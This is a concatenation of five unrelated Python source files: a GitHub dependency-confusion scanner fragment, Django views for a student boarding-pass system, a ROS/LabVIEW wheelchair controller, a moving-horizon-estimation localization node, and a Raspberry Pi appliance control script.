if len(jsonresult['errors']) == 0:
del jsonresult['errors']
jsonresult['scan_time'] = time.time() - starttime
return jsonresult
# gets a list of repos for a git org
def check_repos(self, org):
ret = []
try:
organization = self.GH.organization(org)
repos = organization.repositories(type="all")
for repo in repos:
ret.append(repo.name)
except Exception as e:
print(f"Error: {e} in check_repos")
raise
return ret
# checks a single repo for dependency confusion (now with threading!)
def check_single_repo(self, org, repo):
jsonresult = {repo: [], 'errors': []}
try:
#check rate limits and sleep if need be
core = self.GH.rate_limit()['resources']['core']
if int(core['remaining']) < 500:
resettime = int(core['reset'])
sleepamount = resettime - int(time.time())
                # if we haven't said we are pausing yet, do so now
if not self.RateWarning:
print(f"GIT API RATE LIMIT HIT, SLEEPING FOR: {sleepamount} seconds")
self.RateWarning = True
#pause until the rate limiter resets
time.sleep(sleepamount + 2)
self.RateWarning = False
repository = self.GH.repository(org, repo)
#grab packages from this repo and pull the dependencies from them
files = self.check_repo(repository)
filecontents = self.get_all_manifest_contents(files, repository)
for file in filecontents:
#scan it
scanresult = self.FILESCANNER.scan_contents(file['file'], file['content'], file['override'])
#if we had errors, bubble them up
if 'errors' in scanresult:
jsonresult['errors'].append(scanresult['errors'])
else:
jsonresult[repo].append(scanresult)
#remove empty errors
if len(jsonresult['errors']) == 0:
del jsonresult['errors']
except Exception as e:
if "new thread" not in str(e) and "repository is empty" not in str(e):
print(f"{org} : {repo} : Error: {e} in check_single_repo")
return jsonresult
#traverses a git repo and finds manifest files
def check_repo(self, repo):
files = []
try:
contents = repo.directory_contents("", return_as=dict)
overrides = []
for file in contents:
f = contents[file]
for module in self.FILESCANNER.MODULES['modules']:
if f.path.lower() in module['manifest_file'] or f.path.lower() in module['lock_file'] or ('config_file' in module and f.path.lower() == module['config_file']):
if 'config_file' in module and f.path.lower() == module['config_file']:
                            if module['config_parse_func'](self.get_single_manifest_contents(repo, {'name': f.path, 'override': False})):
overrides = overrides + module['manifest_file'] + module['lock_file']
else:
files.append({'name': f.path, 'override': False})
if f.path.lower() in module['lock_file']:
for file in module['manifest_file'] + module['lock_file'][:-1]:
if not f.path.lower() == file.lower():
overrides.append(file)
break
overrides = list(set(overrides))
for f in files:
if f['name'] in overrides:
f['override'] = True
except Exception as e:
#print(f"Error: {e} in check_repo")
raise
return files
#grabs manifest file contents from git (but with threads this time!)
def get_single_manifest_contents(self, repo, file):
try:
if file['override']:
return {'file': file['name'], 'content': '', 'override': True}
content = repo.file_contents(file['name']).decoded.decode("utf-8")
return {'file': file['name'], 'content': content, 'override': False}
except Exception as e:
#print(f"Error: {e} in ({filename}) get_single_manifest_contents")
raise
#grabs all manifest file contents from git
def get_all_manifest_contents(self, files, repo):
if not files or len(files) == 0:
return []
filecontents = []
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
fut = [executor.submit(self.get_single_manifest_contents, repo, file) for file in files]
for r in concurrent.futures.as_completed(fut):
tmp = r.result()
if tmp is not None:
filecontents.append(r.result())
except Exception as e:
#print(f"Error: {e} in get_all_manifest_contents")
raise
return filecontents
#Yield n number of striped chunks from l.
@staticmethod
def chunks(l, n):
for i in range(0, n):
yield l[i::n]
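    # Illustrative example (not part of the original class, hypothetical values):
    # chunks() stripes the org list across n workers instead of cutting it into
    # contiguous blocks, e.g.
    #   list(GHScanner.chunks(['a', 'b', 'c', 'd', 'e'], 2)) -> [['a', 'c', 'e'], ['b', 'd']]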
#checks a list of orgs for dependency confusion
@staticmethod
def check_org_chunk(resultqueue, orgs, conc, procs, public=False):
results = []
try:
ghscanner = GHScanner(conc, procs, public)
for org in orgs:
res = ghscanner.check_single_org(org)
results.append(res)
print(f"{org} ({res['scan_time']})")
except Exception as e:
print(f"Error: {e} in check_org_chunk")
resultqueue.put(results)
#get recap info for the dac.py file
@staticmethod
def get_dac_recap(results):
r = 0
v = 0
s = 0
for org in results['orgs']:
r += len(org)
oname = next(iter(org))
for repo in org[oname]:
rname = next(iter(repo))
for file in repo[rname]:
fname = next(iter(file))
v += len(file[fname]['vulnerable'])
s += len(file[fname]['sus'])
return {'repos_scanned': r, 'vulnerable': v, 'sus': s}
#writes json output to filename
@staticmethod
def write_output_file(resultsfile, resultsjson, print_name=True):
try:
jsonoutput = json.dumps(resultsjson, indent=4)
with open(resultsfile, "w") as file:
file.write(jsonoutput)
if print_name:
print(os.path.realpath(resultsfile))
except Exception as e:
print(f"Error: {e} in write_output_file")
|
views.py | from django.shortcuts import render, redirect
from StudentManager.functions import viewStudents
from StudentManager.models import Students, Allowed, CurrentSeason, Seasons, CheckIn, Pointers
import concurrent.futures
import threading
from django.utils import timezone
import datetime
from Manager.functions import incrementTotalCheckIn, decrementTotalCheckIn
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from django.contrib import messages
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from Dashboard.decorators import management
@login_required(login_url='login')
def viewStudentsList(request):
#if bool(Group.objects.get(name="accounts") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="principal") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="administrator") in User.objects.get(username=request.user).groups.all()) == False:
# return render(request, 'dashboard/dashboard.html',
# {'CheckStat': CheckStat.objects.get(id=1),
# 'students': Students.objects.all().filter(CheckedOut="Yes").order_by('LastName') | Students.objects.all().filter(CheckedIn="Yes").order_by('LastName'),
# 'mode': 'viewCheckIn'})
return viewStudents(request, "viewStudentsPass.html")
@login_required(login_url='login')
@management
def viewStudentsListAdmin(request):
#if bool(Group.objects.get(name="accounts") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="principal") in User.objects.get(username=request.user).groups.all() or
# Group.objects.get(name="administrator") in User.objects.get(username=request.user).groups.all()) == False:
# return render(request, 'dashboard/dashboard.html',
# {'CheckStat': CheckStat.objects.get(id=1),
# 'students': Students.objects.all().filter(CheckedOut="Yes").order_by('LastName') | Students.objects.all().filter(CheckedIn="Yes").order_by('LastName'),
# 'mode': 'viewCheckIn'})
return viewStudents(request, "viewStudentsPassAdmin.html")
@login_required(login_url='login')
@management
def viewCheckInProfileAdmin(request, pk):
student = Students.objects.get(pk=pk)
season = CurrentSeason.objects.get(pk=1).Season
checkin = ""
allowed = ""
if CheckIn.objects.filter(Student=student, Season=season).exists():
checkedIn = "Yes"
checkin = CheckIn.objects.get(Student=student, Season=season)
else:
checkedIn = "No"
if Allowed.objects.filter(Student=student, Season=season).exists():
allowed = Allowed.objects.get(Student=student, Season=season)
else:
allowed = ""
return render(request, "checkInProfilePassAdmin.html", {'student': student, 'checkedIn': checkedIn, 'checkin': checkin,
'allowed': allowed})
@login_required(login_url='login')
def viewCheckInProfile(request, pk):
student = Students.objects.get(pk=pk)
season = CurrentSeason.objects.get(pk=1).Season
checkin = ""
allowed = ""
if CheckIn.objects.filter(Student=student, Season=season).exists():
checkedIn = "Yes"
checkin = CheckIn.objects.get(Student=student, Season=season)
else:
checkedIn = "No"
if Allowed.objects.filter(Student=student, Season=season).exists():
allowed = Allowed.objects.get(Student=student, Season=season)
else:
allowed = ""
return render(request, "checkInProfilePass.html", {'student': student, 'checkedIn': checkedIn, 'checkin': checkin,
'allowed': allowed})
def Pass_helperAdmin(request, id):
if request.method == "POST":
reason = request.POST.getlist("reason")[0]
current_season = CurrentSeason.objects.get(pk=1)
season = Seasons.objects.get(SeasonName=current_season)
student = Students.objects.get(pk=id)
if Pointers.objects.filter(id=1).exists():
pass_code = Pointers.objects.get(id=1).PassCodePointer + 1
Pointers.objects.filter(id=1).update(PassCodePointer=pass_code)
Pointers.save
else:
pass_code = CheckIn.objects.all().count() + 1
Pointers.objects.create(id=1, Season=season, PassCodePointer=pass_code)
Pointers.save
pass_code = str(pass_code).zfill(4)
print("here")
        # Update the existing clearance record if there is one; otherwise create it.
        if Allowed.objects.filter(Student=student, Season=season).exists():
            Allowed.objects.filter(Student=student, Season=season).update(Clear="Yes")
        else:
            Allowed.objects.create(Student=student, Season=season, Clear="Yes")
if CheckIn.objects.filter(Student=student, Season=season).exists():
CheckIn.objects.filter(Student=student,
Season=season).update(Passed="Yes", PassCode=pass_code,
ReasonPass=reason, DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
else:
CheckIn.objects.create(Student=student,
Season=season, Passed="Yes", PassCode=pass_code,
ReasonPass=reason,
DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
print("checked in----")
def Pass_helper(request, id):
if request.method == "POST":
current_season = CurrentSeason.objects.get(pk=1)
season = Seasons.objects.get(SeasonName=current_season)
student = Students.objects.get(pk=id)
if Pointers.objects.filter(id=1).exists():
pass_code = Pointers.objects.get(id=1).PassCodePointer + 1
Pointers.objects.filter(id=1).update(PassCodePointer=pass_code)
            # QuerySet.update() above already persists the change; no explicit save() is needed.
else:
pass_code = CheckIn.objects.all().count() + 1
Pointers.objects.create(id=1, Season=season, PassCodePointer=pass_code)
Pointers.save
pass_code = str(pass_code).zfill(4)
if CheckIn.objects.filter(Student=student, Season=season).exists():
CheckIn.objects.filter(Student=student,
Season=season).update(Passed="Yes", PassCode=pass_code,
ReasonPass="Fulfilled all requirements.", DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
else:
CheckIn.objects.create(Student=student,
Season=season, Passed="Yes", PassCode=pass_code,
ReasonPass="Fulfilled all requirements.",
DateTimeStamp=timezone.now(),
ByStaffPass=(str(request.user.last_name) + ", " + str(request.user.first_name)))
CheckIn.save
#incrementTotalCheckIn()
print("checked in----")
def sendEMail(request, mailHead, recipient, template, context):
msg=""
if recipient != "None":
html_message = render_to_string("" + template, {
'context': context})
plain_message = strip_tags(html_message)
try:
send_mail(mailHead,
plain_message,
'wagbarafranklin@yahoo.com',
[recipient],
html_message=html_message,
fail_silently=False)
msg = "Email sent Successfully!"
return msg
except:
msg = "Email failed!"
return msg
else:
msg = "Operation Failed! No recipient provided."
return msg
def wardCheckedInEmail(request, pk):
student = Students.objects.get(pk=pk)
mailHead = "You Ward have being Checked-in into Brookstone Secondary Boarding Facility"
#recipient = student.ParentEmail
recipient = "wagbarafranklin@yahoo.com"
context = student
template = "EmailPassSuccess.html"
message = sendEMail(request, mailHead, recipient, template, context)
return message
@login_required(login_url='login')
def Pass(request, pk):
#with concurrent.futures.ThreadPoolExecutor() as executor:
# results = [executor.submit(checkin_helper, request, id), executor.submit(wardCheckedInEmail, request, id)]
# for f in concurrent.futures.as_completed(results):
# if f.result() != "EmailNoneResult":
# message = f.result()
# return message
t1 = threading.Thread(target=Pass_helper, args=[request, pk])
t2 = threading.Thread(target=wardCheckedInEmail, args=[request, pk])
# Thread.start() returns None; set the user-facing message directly.
t1.start()
t2.start()
message = "Verification Successful! Student is cleared to pass."
if "Successful" in message:
messages.success(request, message)
else:
messages.error(request, message)
return redirect("/Pass/viewCheckInProfile/" + str(pk))
#return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
#return redirect("/Pass/viewCheckInProfile/" + str(pk))
@login_required(login_url='login')
@management
def PassAdmin(request, pk):
# with concurrent.futures.ThreadPoolExecutor() as executor:
# results = [executor.submit(checkin_helper, request, id), executor.submit(wardCheckedInEmail, request, id)]
# for f in concurrent.futures.as_completed(results):
# if f.result() != "EmailNoneResult":
# message = f.result()
# return message
t1 = threading.Thread(target=Pass_helperAdmin, args=[request, pk])
t2 = threading.Thread(target=wardCheckedInEmail, args=[request, pk])
# Thread.start() returns None; set the user-facing message directly.
t1.start()
t2.start()
message = "Verification Successful! Student is cleared to pass."
if "Successful" in message:
print("here " + message)
messages.success(request, message)
else:
messages.error(request, message)
return redirect("/Pass/viewCheckInProfileAdmin/" + str(pk)) |
control_with_labview.py | #!/usr/bin/env python
from __future__ import print_function
import threading
import time
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
global task
task ="stop"
import sys, select, termios, tty
from vision_2 import get_obj2w
import socket
import random
PORT = 8089
HOST = '192.168.0.2' # The server's hostname or IP address
#HOST = '127.0.0.1'
from datetime import datetime
from ctypes import *
SIZE_DATA_TCP_MAX = 200
class Data(Union):
_fields_ = [("byte", c_ubyte * SIZE_DATA_TCP_MAX),("int7Arr", c_int * 7),("float63dArr", c_float * 63)]
write_buffer = (c_char* 1024)()
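# Data overlays one block of memory with three views (raw bytes, 7 ints, 63 floats);
# tcp_com() fills the float view and ships it to LabVIEW inside a fixed 1024-byte frame.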
def tcp_init():
global client, send_data
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (HOST, PORT)
client.connect(server_address)
send_data = Data()
def tcp_com():
#'''
global client
global send_data,task
start = datetime.now()
try:
task_data = get_obj2w()
print("task_data",task_data)
send_data.float63dArr[6]=task_data[0,0]
send_data.float63dArr[7]=task_data[0,1]
send_data.float63dArr[8]=task_data[0,2]
except Exception:
# Vision data is optional; keep the previously sent values if get_obj2w() fails.
pass
#send_data.int7Arr[0]=random.randrange(1,100)
send_data.float63dArr[0]=1.7
memmove(write_buffer, send_data.byte, sizeof(send_data))  # copy only the union's bytes; the rest of the 1024-byte frame stays zeroed
client.sendall(write_buffer)
end = datetime.now()
labview_control = client.recv(5)
b = bytearray(labview_control)
print(labview_control)
print(task)
print(b[0],type(b[0]))
# LabVIEW replies with five ASCII digit bytes ('0' == 48, '1' == 49): byte 0 is a stop flag,
# bytes 1-4 select forward, back, left and right respectively.
if b[0] == 48:
task = "stop"
else:
if b[1] == 49:
task = "go_forward"
elif b[2] == 49:
task = "go_back"
elif b[3] == 49:
task = "turn_left"
elif b[4] == 49:
task = "turn_right"
else:
task = "stop"
class ControlWheelchair():
def __init__(self):
rospy.init_node('Controlwheelchair',anonymous=False)
rospy.loginfo("now wheelchair start")
rospy.on_shutdown(self.shutdown)
self.cmd_vel = rospy.Publisher('cmd_vel', Twist, queue_size = 1)
self.rate = rospy.Rate(10)
self.move_cmd = Twist()
#move_cmd.linear.x = 0.3
#move_cmd.angular.z = 0
global task
self.task = task
print("Ros Control",self.task)
while not rospy.is_shutdown():
#self.rate.sleep(10)
self.task = task
print("self task",self.task)
rospy.sleep(0.1)
print("move_cmd",self.move_cmd)
if self.task == "go_forward":
print("lllllllllllllllllllllllllllllllllllllll")
self.move_cmd = Twist()
self.move_cmd.linear.x = 0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="go_back":
self.move_cmd = Twist()
self.move_cmd.linear.x = -0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="turn_left":
self.move_cmd = Twist()
self.move_cmd.angular.z = 0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="turn_right":
self.move_cmd = Twist()
self.move_cmd.angular.z = -0.1
self.cmd_vel.publish(self.move_cmd)
elif self.task =="stop":
print("hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh")
self.move_cmd = Twist()
self.cmd_vel.publish(self.move_cmd)
def shutdown(self):
rospy.loginfo("Stopping wheelchair")
self.cmd_vel.publish(Twist())
rospy.sleep(1)
def tcp_com_while():
while True:
try:
tcp_com()
except Exception as e:
print("tcp_com failed:", e)
time.sleep(0.1)
def control():
ControlWheelchair()
if __name__=="__main__":
#try:
tcp_init()
t_tcp_com = threading.Thread(target=tcp_com_while)
t_tcp_com.start()
ControlWheelchair()
#except:
# rospy.loginfo("End of this trip for wheelchair")
|
mhe_localization_node.py | #!/usr/bin/env python
"""
Moving Horizon Estimation Localization
Copyright © 2020 Mostafa Osman
Permission is hereby granted, free of charge,
to any person obtaining a copy of this software
and associated documentation files (the “Software”),
to deal in the Software without restriction,
including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom
the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Importing the classes for the node
import Odometry_class
import mhe_localization_class
# Importing Python and ROS libraries
import rospy
import math
import threading
import numpy as np
from tf.transformations import euler_from_quaternion
# Importing ROS messages
from std_msgs.msg import Float64
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Pose
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Imu
# Importing Casadi
from sys import path
global data_available
global MHE
global freq
global Odometries
global Odometries_topics
global N_mhe
global N_of_odometries
global N_of_imus
global mahalabonis_thresholds_odom
global first_interface
lock = threading.Lock()
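# main() starts two threads: mhe_interface() builds the MHE problem and stores incoming
# measurements, while mhe_localization_node() runs the estimator whenever data_available is
# set; the lock above is handed to the MHE object for synchronizing shared state.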
def mhe_interface():
global MHE
global data_available
global lock
data_available = False
first_run = True
MHE = mhe_localization_class.mhe_localization(Odometries, freq, N_mhe, N_of_odometries + N_of_imus,
mahalabonis_thresholds_odom, lock)
MHE.problem_formulation()
rate = rospy.Rate(freq)
while not rospy.is_shutdown():
if first_run:
for i in range(0, N_of_odometries + N_of_imus):
if Odometries[i].first_call:
pass
else:
first_run = False
data_available = MHE.measurements_storing()
rate.sleep()
if not first_run:
data_available = MHE.measurements_storing()
rate.sleep()
def mhe_localization_node():
global data_available
global lock
data_available = False
starting_counter = 0
rate = rospy.Rate(freq) # hz
while not rospy.is_shutdown():
# mhe localization
if data_available:
MHE.mhe()
data_available = False
rate.sleep()
def main():
global freq
global Odometries
global Odometries_topics
global N_mhe
global N_of_odometries
global N_of_imus
global mahalabonis_thresholds_odom
global first_interface
# Initializing the ROS node with a name "mhe_localization"
rospy.init_node('mhe_localization', anonymous=True)
# Getting the parameters from the config file of the package (number of odometries and the odometry topic names)
if rospy.has_param('N_of_Odometries'):
N_of_odometries = rospy.get_param('N_of_Odometries')
else:
rospy.logerr('The parameter N_of_Odometries is not specified in the yaml file')
if rospy.has_param('N_of_imus'):
N_of_imus = rospy.get_param('N_of_imus')
else:
rospy.logerr('The parameter N_of_imus is not specified in the yaml file')
if rospy.has_param('node_frequency'):
freq = rospy.get_param('node_frequency')
else:
rospy.logerr('The parameter node_frequency is not specified in the yaml file')
if rospy.has_param('estimation_horizon'):
N_mhe = rospy.get_param('estimation_horizon')
else:
rospy.logerr('The parameter estimation_horizon is not specified in the yaml file')
mahalabonis_thresholds_odom = np.zeros(N_of_odometries)
mahalabonis_thresholds_imu = np.zeros(N_of_imus)
Odometries_topics = [""] * N_of_odometries
Imus_topics = [""] * N_of_imus
Odometries_configuration = np.zeros((N_of_odometries, 15))
Imu_configuration = np.zeros((N_of_imus, 15))
Odometries = [Odometry_class.OdometryInterface() for i in range(N_of_odometries + N_of_imus)]
# Initializing the Odometry Objects and subscribing to the topics indicated in the parameter file
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i) + '_mahalanobis_threshold'):
mahalabonis_thresholds_odom[i] = rospy.get_param("odom_" + str(i) + '_mahalanobis_threshold')
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i) + '_mahalanobis_threshold'):
mahalabonis_thresholds_imu[i] = rospy.get_param('imu_' + str(i) + '_mahalanobis_threshold')
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i)):
Odometries_topics[i] = rospy.get_param("odom_" + str(i))
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i)):
Imus_topics[i] = rospy.get_param('imu_' + str(i))
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
if rospy.has_param('odom_' + str(i) + '_config'):
Odometries_configuration[i, :] = rospy.get_param("odom_" + str(i) + "_config")
else:
rospy.logerr('Number of Odometries indicated in the yaml file is not correct')
for i in range(0, N_of_imus):
if rospy.has_param('imu_' + str(i) + '_config'):
Imu_configuration[i, :] = rospy.get_param('imu_' + str(i) + '_config')
else:
rospy.logerr('Number of imus indicated in the yaml file is not correct')
for i in range(0, N_of_odometries):
Odometries[i].Odometry_initialize(i, Odometries_topics[i], Odometries_configuration[i, :], N_mhe,
mahalabonis_thresholds_odom[i])
rospy.Subscriber(Odometries_topics[i], Odometry, Odometries[i].odometryCb, queue_size=1)
for i in range(N_of_odometries, N_of_odometries + N_of_imus):
Odometries[i].Imu_initialize(i, Imus_topics[i - N_of_odometries],
Imu_configuration[i - N_of_odometries, :], N_mhe,
mahalabonis_thresholds_imu[i - N_of_odometries])
rospy.Subscriber(Imus_topics[i - N_of_odometries], Imu, Odometries[i].odometryCb, queue_size=1)
threading.Thread(target=mhe_interface).start()
threading.Thread(target=mhe_localization_node).start()
rospy.spin()
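# A sketch of the expected parameter layout, matching the rospy.get_param keys above
# (topic names, counts and the 15-element config masks are illustrative assumptions):
#
#   N_of_Odometries: 1
#   N_of_imus: 1
#   node_frequency: 20
#   estimation_horizon: 10
#   odom_0: "/wheel_odom"
#   odom_0_config: [1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0]
#   odom_0_mahalanobis_threshold: 5.0
#   imu_0: "/imu/data"
#   imu_0_config: [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0]
#   imu_0_mahalanobis_threshold: 5.0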
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
exec.py | import sys, os, time, json, queue
import datetime
import board, busio
import serial
import paho.mqtt.client as mqtt
import RPi.GPIO as GPIO
import adafruit_character_lcd.character_lcd_i2c as character_lcd
import MAX6675
from hx711 import HX711
import random
import threading
global g_print_lcd_output_door_topic
g_print_lcd_output_door_topic = ''
global g_print_lcd_output_door_msg
g_print_lcd_output_door_msg = ''
global g_print_lcd_safe_door_topic
g_print_lcd_safe_door_topic = ''
global g_print_lcd_safe_door_msg
g_print_lcd_safe_door_msg = ''
q = queue.Queue()
global buzzer_running
buzzer_running = 0
global arr_count
arr_count = 5
global bottom_temp_arr, top_temp_arr
bottom_temp_arr = [0,0,0,0,0]
top_temp_arr = [0,0,0,0,0]
#---SET Pin-------------------------------------------------------------
# Switch
Debug_switch_pin = 16 # Debug Switch : Digital_Input_3
SW4_pin = 38 # Start Button : Digital_Input_2
Push_SW_pin = 38 # Start Button : Digital_Input_8
Select_SW = 6 # Select Switch : Digital_Input_7
# Load Cell (Direct)
DAT = 34
CLK = 35
# LCD I2C
SDA = 30 # SDA_LCD-DAT 28
SCL = 31 # SCL_LCD-CLK 27
# Digital IN
Input_Door_pin = 7 # Input Door Sensor() : Digital_Input_4
Output_Door_pin = 10 # Output Door Sensor() : Digital_Input_5
Safe_Door_pin = 11 # Safe Door Sensor(Front Door) : Digital_Input_6
# Digital OUT (Arduino)
Heat_12 = 13 # Digital_Output_12
Heat_3 = 12 # Digital_Output_11
Heat_4 = 11 # Digital_Output_10
Mix_motor = 10 # Digital_Output_13(red)
Cooling_motor = 9 # Digital_Output_14
Sol_val = 6 # Digital_Output_15
Buzzer = 5
# Temperature 1 Top
CLK1 = 27 # Digital_Input_9
CS1 = 26 # Digital_Input_10
SO1 = 17 # Digital_Input_11
# Temperature 2 Bottom
CLK2 = 41 # Digital_Input_12
CS2 = 40 # Digital_Input_13
SO2 = 39 # Digital_Input_14
#---SET GPIO------------------------------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Switch
GPIO.setup(Debug_switch_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(SW4_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(Push_SW_pin, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(Select_SW, GPIO.IN, GPIO.PUD_UP)
# Door
GPIO.setup(Input_Door_pin, GPIO.IN,GPIO.PUD_UP)
GPIO.setup(Output_Door_pin, GPIO.IN,GPIO.PUD_UP)
GPIO.setup(Safe_Door_pin, GPIO.IN,GPIO.PUD_UP)
#---GET Door------------------------------------------------------------
def get_input_door(Input_Door_pin):
input_door = GPIO.input(Input_Door_pin)
json_input_door = val_to_json(input_door)
return (json_input_door)
def get_output_door(Output_Door_pin):
output_door = GPIO.input(Output_Door_pin)
json_output_door = val_to_json(output_door)
return (json_output_door)
def get_safe_door(Safe_Door_pin):
safe_door = GPIO.input(Safe_Door_pin)
json_safe_door = val_to_json(safe_door)
return (json_safe_door)
#-----------------------------------------------------------------------
#---Operation Mode------------------------------------------------------
def Operation(Select_SW):
sel_sw = GPIO.input(Select_SW)
sel_sw = val_to_json(sel_sw)
return (sel_sw)
#---Start Button--------------------------------------------------------
def start_btn(SW4_pin):
SW4 = GPIO.input(SW4_pin)
SW4 = val_to_json(SW4)
return (SW4)
# Temperature
sensor1 = MAX6675.MAX6675(CLK1, CS1, SO1)
sensor2 = MAX6675.MAX6675(CLK2, CS2, SO2)
#---GET Temperature-----------------------------------------------------
def get_temp():
global avg_bottom_temp, avg_top_temp
top_temp = round(sensor1.readTempC(), 1)
bottom_temp = round(sensor2.readTempC(), 1)
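# Shift the five-sample ring buffers left, append the newest readings, and return the
# running averages so single noisy MAX6675 samples are smoothed out.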
for i in range(arr_count):
if (i > 0):
bottom_temp_arr[i-1] = bottom_temp_arr[i]
top_temp_arr[i-1] = top_temp_arr[i]
bottom_temp_arr[arr_count-1] = bottom_temp
top_temp_arr[arr_count-1] = top_temp
avg_bottom_temp = round((sum(bottom_temp_arr) / arr_count), 2)
avg_top_temp = round((sum(top_temp_arr) / arr_count), 2)
temperature1 = val_to_json(avg_top_temp, avg_bottom_temp)
return (temperature1)
#---Debug Button--------------------------------------------------------
def debug_mode(Debug_switch_pin):
debug_val = GPIO.input(Debug_switch_pin)
debug_val = val_to_json(debug_val)
return (debug_val)
#---SET Load Cell & GET Weight------------------------------------------
EMULATE_HX711 = False  # assumed: a real HX711 is attached; the flag is referenced below but was never defined
def cleanAndExit():
print("Cleaning...")
if not EMULATE_HX711:
GPIO.cleanup()
print("Bye!")
sys.exit()
def init_loadcell(referenceUnit = 1):
global hx
global nWeightCount
nWeightCount = 1
hx = HX711(34, 35)
hx.set_reading_format("MSB", "MSB")
hx.set_reference_unit(referenceUnit)
hx.reset()
def set_factor(referenceUnit):
hx.set_reference_unit(referenceUnit)
hx.reset()
def calc_ref_Unit(reference_weight, set_ref_Unit):
ref_weight_total = 0
for i in range(nWeightCount):
weight = hx.get_weight(5)
ref_weight_total += weight
avg_ref_weight = (ref_weight_total / nWeightCount)
cur_weight = (avg_ref_weight - avg_zero_weight)
cur_weight = max(0, float(cur_weight))
cur_factor = (cur_weight / reference_weight)
if (cur_factor == 0.0):
cur_factor = set_ref_Unit
hx.set_reference_unit(cur_factor)
hx.reset()
factor_weight_total = 0
for i in range(nWeightCount):
weight = hx.get_weight(5)
factor_weight_total += weight
avg_factor_weight = (factor_weight_total / nWeightCount)
avg_factor_weight = max(0, float(avg_factor_weight))
correlation_value = avg_factor_weight - reference_weight
factor = {"factor":cur_factor, "correlation_value":correlation_value}
with open ("./factor.json", "w") as factor_json:
json.dump(factor, factor_json)
print("Complete!")
calc_ref_unit = val_to_json(cur_factor, correlation_value)
return calc_ref_unit
def get_loadcell():
global flag
global weight_arr
try:
if (flag == 0):
for i in range(arr_count):
weight = hx.get_weight(5)
weight_arr[i] = weight
flag = 1
else:
weight = hx.get_weight(5)
for i in range(arr_count):
if (i > 0):
weight_arr[i-1] = weight_arr[i]
weight_arr[arr_count-1] = weight
avg_weight = round((sum(weight_arr) / arr_count), 2)
final_weight = avg_weight - correlation_value
final_weight = max(0, float(final_weight))
weight_json = val_to_json(final_weight)
except (KeyboardInterrupt, SystemExit):
cleanAndExit()
return (weight_json)
def ref_weight(tare_weight):
global reference_weight
reference_weight = tare_weight
val = val_to_json(1)
init_loadcell(1)
global avg_zero_weight
zero_weight = 0
for i in range(5):
weight = hx.get_weight(5)
zero_weight += weight
avg_zero_weight = (zero_weight / 5)
avg_zero_weight = max(0, float(avg_zero_weight))
print("Add weight for initialize...")
return val
#-----------------------------------------------------------------------
#---Serial Communication with Arduino-----------------------------------
def Serial_Feather(pin=None, pin2=None, pin3=None, val=None, val2=None, val3=None):
if (pin != None and pin2 == None and pin3 == None):
ser_msg = ('<' + str(pin) + ',' + str(val) + '>\n').encode()
#print(ser_msg)
ser.write(ser_msg)
elif (pin != None and pin2 != None and pin3 != None):
ser_msg = ('<' + str(pin) + ',' + str(val) + '/' + str(pin2) + ',' + str(val2) + '/' + str(pin3) + ',' + str(val3) + '>\n').encode()
#print(ser_msg)
ser.write(ser_msg)
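# Frames are plain ASCII: '<pin,val>' for a single output, or '<pin,val/pin2,val2/pin3,val3>'
# for the three heater channels, newline-terminated for the Arduino-side parser.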
#-----------------------------------------------------------------------
#---Heater--------------------------------------------------------------
def heater(Heat_12, Heat_3, Heat_4, val, val2, val3):
Serial_Feather(pin=Heat_12, pin2=Heat_3, pin3=Heat_4, val=val, val2=val2, val3=val3)
#---Buzzer--------------------------------------------------------------
def buzzer(Buzzer, val):
Serial_Feather(pin=Buzzer, val=val)
#print ("Beep")
